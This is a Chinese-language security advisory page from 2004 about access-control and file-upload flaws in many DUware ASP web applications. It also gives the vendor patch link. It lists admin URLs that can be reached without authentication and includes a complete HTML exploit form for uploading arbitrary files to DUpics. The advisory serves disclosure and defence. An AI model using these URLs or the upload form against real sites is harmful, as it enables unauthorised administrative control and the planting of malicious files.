首页 -> 安全研究

安全研究

安全漏洞
DUware多个组件管理员访问文件上传漏洞

发布日期:2004-01-20
更新日期:2004-02-03

受影响系统:
DUware DUportal 3.0
DUware DUcalendar 1.1
DUware DUcalendar 1.0
DUware DUclassified 4.1
DUware DUclassified 4.0
DUware DUdirectory 3.0
DUware DUdownload 1.0
DUware DUgallery 3.3
DUware DUgallery 3.2
DUware DUgallery 3.1
DUware DUgallery 3.0
DUware DUpics 3.0
DUware DUarticle 1.0
DUware DUclassmate 1.0
DUware DUpoll 3.0
DUware DUnews 1.0
DUware DUamazon 3.0
DUware DUpaypal 3.0
DUware DUfaq 1.0
DUware DUforum 3.0
描述:
BUGTRAQ  ID: 9462

DUware包含多个基于WEB程序的系统,包括日历,下载,新闻系统等。

DUware包含的多个程序访问验证问题,远程攻击者可以利用这个漏洞绕过验证访问敏感信息,并上传恶意文件等。

DUware多个脚本没有正确的安全访问检查,攻击者可以直接访问这些管理脚本,以管理员身份控制应用程序。并可以通过提交恶意表单上传任意文件。

<*来源:Security Corporation Security Advisory (advisory@security-corporation.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107463837012862&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Security Corporation Security Advisory (advisory@security-corporation.com)提供了如下测试方法:

- Admin Access :

- http://[target]/admin/inc_edit.asp?iEve=1
- http://[target]/admin/inc_events.asp
- http://[target]/admin/inc_type.asp


>> DUclassified :
- http://[target]/admin/inc_cats.asp
- http://[target]/admin/inc_users.asp
- http://[target]/admin/inc_user_edit.asp?id=admin

>> DUdirectory :
- http://[target]/admin/inc_links.asp
- http://[target]/admin/inc_edit.asp?iLink=10
- http://[target]/admin/inc_type.asp

>> DUdownload :
- http://[target]/admin/inc_files.asp
- http://[target]/admin/inc_edit.asp?iFile=50
- http://[target]/admin/inc_type.asp

>> DUgallery :
- http://[target]/admin/inc_pictures.asp
- http://[target]/admin/inc_edit.asp?iPic=100
- http://[target]/admin/inc_type.asp

>> DUpics :
- http://[target]/admin/inc_add.asp
- http://[target]/admin/inc_pics.asp
- http://[target]/admin/inc_edit.asp?iPic=500
- http://[target]/admin/inc_type.asp

>> DUportal :
- http://[target]/admin/inc_channel_listing.asp
- http://[target]/admin/inc_channel_edit.asp?iChannel=5
- http://[target]/admin/inc_config.asp
- http://[target]/admin/inc_users.asp
- http://[target]/admin/inc_users_edit.asp?iUser=admin

etc...

- Arbitrary File Upload :

>> DUpics :

------------------Dupicsexploit.html------------------
<html>
<head><title>DUpics 3.0 Arbitrary File Upload Exploit</title></head>
<body>
<form action="/admin/inc_add.asp?GP_upload=true" method="post"
enctype="multipart/form-data"
onsubmit="this.action=this.url.value+this.action;alert('Your file will be
uploaded to '+this.url.value+'/pictures/');">
Target URL : <input type="text" name="url"
value="http://[target]/DUpics/"><br>
FILE : <input name="PIC_IMAGE" type="file"><br>
<input type="hidden" name="PIC_NAME" value="admin">
<input type="hidden" name="PIC_WIDTH">
<input type="hidden" name="PIC_HEIGHT">
<input type="hidden" name="PIC_APPROVED" value="1">
<input type="hidden" name="MM_insert" value="true">
<input type="submit" value="Upload" name="submit">
</form>
<p align="right">For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com</a></p>
</body>
</html>
------------------Dupicsexploit.html------------------

建议:
厂商补丁:

DUware
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.duware.com/home/

浏览次数:3173
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障